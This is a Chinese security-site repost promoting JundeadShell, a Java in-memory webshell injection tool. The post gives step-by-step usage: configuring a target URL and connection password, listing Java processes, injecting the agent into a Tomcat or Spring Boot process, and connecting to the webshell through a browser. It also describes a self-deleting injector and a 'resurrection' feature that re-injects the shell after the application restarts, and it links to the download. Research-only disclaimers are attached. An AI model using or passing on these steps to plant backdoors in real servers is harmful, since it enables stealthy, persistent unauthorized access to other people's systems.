干货|Java内存马注入工具

admin 2022年1月16日13:25:44评论212 views字数 965阅读3分13秒阅读模式

作者:WisteriaTige,转载于github,如侵权请联系删除。


一个可以复活的Java内存马

用法

1.先根据环境修改配置文件

配置文件位置在: agent_starter.jar内部config目录下

# 目标url IP地址可以是127.0.0.1。在web应用关闭时,会挂起一个新进程用于监听。当web应用重新启动后,会自动重新注入。
target_url=http://127.0.0.1:80/
# 连接密码的md5值 默认密码:Jundead
password=AC9A489BB6873C5FB760370FD62A793E
# 调试模式 开启后会在当前目录创建日志文件,也会在目标web服务中打印少量日志信息。
debug=false

2.列出Java进程列表

java -jar agent_starter.jar list

3.根据进程名注入

java -jar agent_starter.jar <displayName> <tomcat_version>

举例:java -jar agent_starter.jar "SpringbootDemo.jar" 9

注入进程的displayName是SpringbootDemo.jar,使用的tomcat_version是9。

PS: tomcat容器的进程名一般是:"org.apache.catalina.startup.Bootstrap start"

注入成功后会自动删除自身。

4.连接webshell

浏览器访问http://x.x.x.x/xxx?password=密码

FAQ

  • 注入成功了,但webshell不生效?

如果注入目标是Tomcat容器的应用,连接webshell的url必须是能够正常访问的url。如果注入目标是springboot框架应用,连接webshell的url可以是任意url。

Disclaimers

该项目仅供学习、研究之用,禁止用于非法用途。


下载地址:https://github.com/WisteriaTiger/JundeadShell



往期推荐

干货|红队自动化渗透框架

实战|记一次hw中的上线骚姿势

强荐 | 渗透测试报告自动生成工具

干货|通过 RPC 防火墙停止横向移动

五款顶级的Docker容器GUI工具

一款批量漏洞挖掘工具

原文始发于微信公众号(HACK之道):干货|Java内存马注入工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月16日13:25:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货|Java内存马注入工具https://cn-sec.com/archives/739293.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息